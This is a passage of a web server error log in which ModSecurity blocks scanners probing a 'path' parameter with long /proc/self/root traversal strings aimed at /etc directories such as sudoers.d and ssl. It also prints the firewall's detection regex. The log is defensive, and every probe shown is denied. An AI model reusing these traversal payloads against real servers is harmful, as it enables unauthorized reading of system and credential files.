[Tue Mar 17 15:03:20.722199 2026] [:error] [pid 7437:tid 140411548894976] [client 74.7.241.31:37174] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXaAeiSKl8TjouI-YfHAAAA9c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:03:22.370686 2026] [:error] [pid 9299:tid 140411691570944] [client 74.7.241.31:37180] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXar-sgTmmJoPuMdy78AAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:03:23.783261 2026] [:error] [pid 6296:tid 140411658000128] [client 74.7.241.31:37188] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXa3Ik7brgkOH-rIWRRAAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:03:23.870640 2026] [:error] [pid 17965:tid 140411632822016] [client 74.7.244.43:43654] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmXa6t8Nd0UC_OcbVHQWwAAAI0"]
[Tue Mar 17 15:03:25.219158 2026] [:error] [pid 7004:tid 140411716749056] [client 74.7.241.31:37194] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXbcU6Sx0TG1YjmQi0fQAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:03:27.678897 2026] [:error] [pid 17965:tid 140411574073088] [client 74.7.241.31:37202] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXbqt8Nd0UC_OcbVHQXQAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:03:27.919577 2026] [:error] [pid 17965:tid 140411582465792] [client 74.7.241.31:37202] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXb6t8Nd0UC_OcbVHQXwAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:03:28.133789 2026] [proxy_fcgi:error] [pid 7437:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:54038] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:03:28.399340 2026] [:error] [pid 9299:tid 140411699963648] [client 74.7.228.61:40638] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmXcL-sgTmmJoPuMdy7-gAAAsU"]
[Tue Mar 17 15:03:29.763403 2026] [:error] [pid 9299:tid 140411741927168] [client 74.7.241.31:56640] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXcb-sgTmmJoPuMdy7_QAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:03:33.327724 2026] [:error] [pid 9299:tid 140411666392832] [client 74.7.241.31:56656] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXdb-sgTmmJoPuMdy8AgAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:03:36.939312 2026] [:error] [pid 9299:tid 140411708356352] [client 74.7.241.31:56670] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXeL-sgTmmJoPuMdy8DAAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:03:40.004137 2026] [:error] [pid 7437:tid 140411658000128] [client 74.7.241.31:40500] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXfAeiSKl8TjouI-YfIgAAA8o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:03:44.720043 2026] [:error] [pid 2473:tid 140411632822016] [client 74.7.241.31:40502] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXgKBJNF7axNlVR0Ud3wAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:03:46.412816 2026] [mime_magic:error] [pid 9299:tid 140411641214720] (70014)End of file found: [client 74.7.243.128:56288] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/opt/puppetlabs
[Tue Mar 17 15:03:48.527301 2026] [:error] [pid 17965:tid 140411599251200] [client 74.7.241.31:48626] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXhKt8Nd0UC_OcbVHQZAAAAJE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:03:48.847527 2026] [:error] [pid 17965:tid 140411616036608] [client 216.73.216.191:48829] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXhKt8Nd0UC_OcbVHQZQAAAI8"]
[Tue Mar 17 15:03:48.989320 2026] [:error] [pid 7437:tid 140411725141760] [client 216.73.216.191:31594] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXhAeiSKl8TjouI-YfLAAAA8I"]
[Tue Mar 17 15:03:50.121777 2026] [proxy_fcgi:error] [pid 7004:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:54660] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:03:51.356895 2026] [:error] [pid 29151:tid 140411649607424] [client 74.7.241.31:48636] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXh_PqhzTj3BvfDX-NiwAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:03:54.256284 2026] [:error] [pid 17965:tid 140411683178240] [client 74.7.241.31:48640] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXiqt8Nd0UC_OcbVHQZwAAAIc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:03:55.643223 2026] [:error] [pid 2473:tid 140411658000128] [client 74.7.243.128:41292] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXi6BJNF7axNlVR0Ud5QAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:03:56.235632 2026] [:error] [pid 7437:tid 140411741927168] [client 216.73.216.191:14771] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sasl2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXjAeiSKl8TjouI-YfMwAAA8A"]
[Tue Mar 17 15:03:57.828192 2026] [:error] [pid 9299:tid 140411741927168] [client 74.7.241.31:60128] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXjb-sgTmmJoPuMdy8EwAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:04:01.364182 2026] [:error] [pid 2598:tid 140411733534464] [client 74.7.241.31:60140] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXkRj0p0SRWAqcjGF_NgAAAwE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:04:01.957427 2026] [:error] [pid 18380:tid 140411666392832] [client 216.73.216.191:26977] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmXka4xEDsg_V3ESNZR0AAAAgk"]
[Tue Mar 17 15:04:05.257026 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.241.31:60150] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname 